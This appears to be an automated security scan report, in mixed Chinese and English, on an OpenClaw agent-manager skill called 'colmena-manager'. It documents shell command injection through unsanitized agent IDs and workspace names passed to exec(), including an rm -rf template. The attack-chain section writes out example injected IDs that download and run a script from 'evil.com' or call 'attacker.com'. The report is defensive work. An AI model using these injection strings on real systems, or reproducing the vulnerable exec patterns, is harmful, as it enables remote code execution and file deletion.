中文 EN

扫描报告

扫描新文件

可疑 — 风险评分 50/100
上次扫描:22 小时前 重新扫描
50 /100
colmena-manager
Skill para gestionar y coordinar agentes de OpenClaw como una colmena
Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.
技能名称colmena-manager
分析耗时73.8s
引擎pi
谨慎使用
Do not deploy. Replace all exec() calls with parameterized APIs. Remove direct shell command construction. Add proper allowed-tools declarations. Audit agent.id and name inputs for shell metacharacters before use in any command context.

攻击链 4 步

提权 Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
src/index.js:12
入口 Victim runs 'colmena-manager health-check' to monitor the hive
src/index.js:120
提权 healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1
src/index.js:131
影响 Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
src/index.js:131

安全发现 6 项

严重性 安全发现 位置
高危
Command injection via agentId in multiple exec() calls 代码执行
The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked.
command: `tail -n ${lines} /home/nvi/.openclaw/sessions/${agentId}/logs.txt`
→ Validate agentId against a strict alphanumeric/whitelist pattern before using in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.
 src/index.js:66
高危
Command injection via workspace name in rm -rf 代码执行
The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user.
command: `rm -rf /home/nvi/.openclaw/workspace-${name}`
→ Validate workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.
 src/index.js:193
高危
Shell execution completely absent from SKILL.md 文档欺骗
SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication it requires shell:WRITE permissions or executes system commands.
- `exec` / `process`: Para health checks y diagnósticos del sistema
→ SKILL.md must explicitly declare shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.
 SKILL.md:55
中危
Referenced HEARTBEAT.md does not exist 文档欺骗
SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities.
La skill incluye un archivo HEARTBEAT.md que se ejecuta automáticamente cada 30 minutos
→ Either implement HEARTBEAT.md or remove all references to it from documentation. If implemented, declare its resource requirements explicitly.
 SKILL.md:64
中危
No allowed-tools declaration despite full shell/filesystem access 权限提升
claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities.
No 'allowedTools' or 'permissions' field present
→ Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}
 claws.json:1
低危
Hardcoded /home/nvi/ path creates dependency on specific user account 敏感访问
All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in SKILL.md requirements. The skill will silently fail on systems where this user does not exist.
/home/nvi/.openclaw/sessions/${agentId}/logs.txt
→ Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.
 src/index.js:66
资源类型声明权限推断权限状态证据
命令执行 NONE WRITE ✗ 越权 src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.…
文件系统 NONE WRITE ✗ 越权 src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec
技能调用 NONE READ ✓ 一致 src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API…
1 严重 3 项发现
💀
严重 危险命令 危险 Shell 命令
rm -rf /
src/index.js:193
🔗
中危 外部 URL 外部 URL
https://clawhub.com/colmena-manager
claws.json:15
📧
提示 邮箱 邮箱地址
[email protected]
claws.json:18

目录结构

5 文件 · 14.1 KB · 552 行
JavaScript 1f · 289L Markdown 2f · 211L JSON 2f · 52L
├─ 📁 src
│ └─ 📜 index.js JavaScript 289L · 7.9 KB
├─ 📋 claws.json JSON 31L · 671 B
├─ 📋 package.json JSON 21L · 470 B
├─ 📝 README.md Markdown 36L · 1.1 KB
└─ 📝 SKILL.md Markdown 175L · 4.0 KB

依赖分析 1 项

包名版本来源已知漏洞备注
openclaw >=1.0.0 npm (peer dep) Peer dependency, not bundled. No known vulnerabilities.

安全亮点

✓ Skill implements its stated functionality (agent management) without additional hidden data exfiltration
✓ No base64-encoded payloads or obfuscated code blocks found
✓ No credential harvesting from ~/.ssh, ~/.aws, or .env files
✓ No network requests to external IPs detected
✓ No reverse shell, C2, or data theft mechanisms present
✓ No cron/scheduled task persistence mechanisms found
✓ No malicious dependencies detected; package.json has minimal legitimate dependencies